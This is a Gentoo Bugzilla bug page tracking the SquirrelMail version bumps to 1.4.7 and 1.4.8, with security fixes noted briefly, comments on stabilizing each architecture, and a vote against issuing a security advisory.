First Last Prev Next    No search results available      Search page      Enter new bug
Bug#: 139273
Alias:
Product:
Component:
Status: RESOLVED
Resolution: FIXED
Assigned To: Gentoo Security <security@gentoo.org>
Hardware:
OS:
Version:
Priority:
Severity:
Reporter: Dan Foster <dsf@globalcrossing.net>
Add CC:
CC:
Remove selected CCs
URL:
Summary:
Status Whiteboard:
Keywords:

Filename Description Type Creator Created Size Actions
sqm.patch Squirrelmail 1.4.6-r3 to 1.4.7 ebuild diff patch Dan Foster 2006-07-12 22:52 0000 335 bytes Details | Diff
emerge.info emerge --info text/plain Michael Weyershäuser 2006-08-12 10:28 0000 2.44 KB Details
Create a New Attachment (proposed patch, testcase, etc.) View All

Bug 139273 depends on: Show dependency tree
Bug 139273 blocks:
Votes: 0    Show votes for this bug    Vote for this bug

Additional Comments: (this is where you put emerge --info)


Not eligible to see or edit group visibility for this bug.






View Bug Activity   |   Format For Printing   |   XML   |   Clone This Bug

Description:   Opened: 2006-07-05 01:23 0000 
1.4.7 was released yesterday. 1.4.6-r3 is the current stable version in
Portage.

It includes a minor security fix, and contains mostly minor bug fixes. No API
changes or any major changes were made.

The ChangeLog is at:

http://www.squirrelmail.org/changelog.php

Version bump is requested. Thanks!

------- Comment #1 From Jakub Moc (RETIRED) 2006-07-05 02:07:37 0000 ------- 
> It includes a minor security fix

Already patched (Bug 135921), no job for security here.

------- Comment #2 From Dan Foster 2006-07-12 22:52:59 0000 ------- 
Created an attachment (id=91615) [edit]
Squirrelmail 1.4.6-r3 to 1.4.7 ebuild diff

The epatch lines in .ebuild was deleted because 1.4.7 integrates the security
fix entirely.

No other changes required, as no plugins were obsoleted when going from 1.4.6
to 1.4.7. No other functionality changes, either, as this is a minor,
incremental bug fix release.

Tested in local portage overlay repository by copying 1.4.6-r3 ebuild to 1.4.7,
applying the proposed ebuild patch, running ebuild digest on the ebuild, then a
normal emerge subversion.

It worked correctly post-installation as well.

------- Comment #3 From Daniel Webert 2006-08-09 12:42:29 0000 ------- 
ping - the 1.4.7 has not just the backported security-fix, there also some
other features/fixes ... plz bump

------- Comment #4 From Stefan Cornelius (RETIRED) 2006-08-09 14:42:24 0000 ------- 
indeed, please bump

------- Comment #5 From Tuan Van (RETIRED) 2006-08-09 17:30:28 0000 ------- 
I commited 1.4.7 on behalf of net-mail team as eradicator has been MIA.

Thanks,
Tuan

------- Comment #6 From Stefan Cornelius (RETIRED) 2006-08-09 23:14:50 0000 ------- 
arches, please test and stable 1.4.7, thank you

------- Comment #7 From Sune Kloppenborg Jeppesen 2006-08-10 01:33:36 0000 ------- 
@jakub: It appears that we didn't fix the following issue mentioned in the
changelog:

  - Security: Possible cookie theft in src/redirect.php if
    register_globals is enabled, and malicous site is running
    in same domain.

------- Comment #8 From Joshua Jackson 2006-08-10 21:43:46 0000 ------- 
1.4.7 ate my mail ;) I didn't want it anyways on x86 ^.^;;

------- Comment #9 From Markus Rothe 2006-08-11 06:08:15 0000 ------- 
ppc64 stable

------- Comment #10 From Stefan Cornelius (RETIRED) 2006-08-11 07:38:42 0000 ------- 
1.4.8 was released, including yet another security fix. Tuan, could you do some
bumping magic again?

------- Comment #11 From Tuan Van (RETIRED) 2006-08-11 09:21:52 0000 ------- 
(In reply to comment #10)
> 1.4.8 was released, including yet another security fix. Tuan, could you do some
> bumping magic again?
> 

done. back to you. thanks.

------- Comment #12 From Tobias Scherbaum 2006-08-11 14:09:59 0000 ------- 
1.4.8 ppc stable

------- Comment #13 From Stefan Cornelius (RETIRED) 2006-08-12 02:45:42 0000 ------- 
Arches, please test and stable squirrelmail 1.4.8. And lets hope that they dont
issue another patch while we try to get this one stable ;)

------- Comment #14 From Andrej Kacian (RETIRED) 2006-08-12 05:35:48 0000 ------- 
x86 done

------- Comment #15 From Markus Rothe 2006-08-12 07:16:38 0000 ------- 
ppc64 stable

------- Comment #16 From Jason Wever (RETIRED) 2006-08-12 09:21:22 0000 ------- 
As my poppa used to say, the only thing better than one SPARC keyword is five
SPARC keywords.

------- Comment #17 From Michael Weyershäuser 2006-08-12 10:28:22 0000 ------- 
Created an attachment (id=94071) [edit]
emerge --info

working fine on amd64 :)

------- Comment #18 From Thomas Cort (RETIRED) 2006-08-12 10:36:54 0000 ------- 
amd64 stable.

------- Comment #19 From Thomas Cort (RETIRED) 2006-08-12 20:23:58 0000 ------- 
alpha stable.

------- Comment #20 From Raphael Marichez 2006-08-16 01:42:14 0000 ------- 
time to vote

CVE-2006-3665 (fixed in 1.4.7) deals with "register_global=on" and i don't want
to hear about a glsa for this.


 - Security: Make sure that code only sets those variables that are needed in
    compose and are not already set. Thanks James Bercegay from GulfTech for
    pointing this out. [CVE-2006-4019]

I hardly understand the impact.

I vote no-glsa.

------- Comment #21 From Sune Kloppenborg Jeppesen 2006-08-19 09:03:31 0000 ------- 
Voting a full NO and closing.

Feel free to reopen if you disagree.

------- Comment #22 From Jeremy Huddleston (RETIRED) 2007-05-21 17:17:14 0000 ------- 
This was marked as closed but was never fixed for ~arch.  1.5.1-r4 contains the
fix.
First Last Prev Next    No search results available      Search page      Enter new bug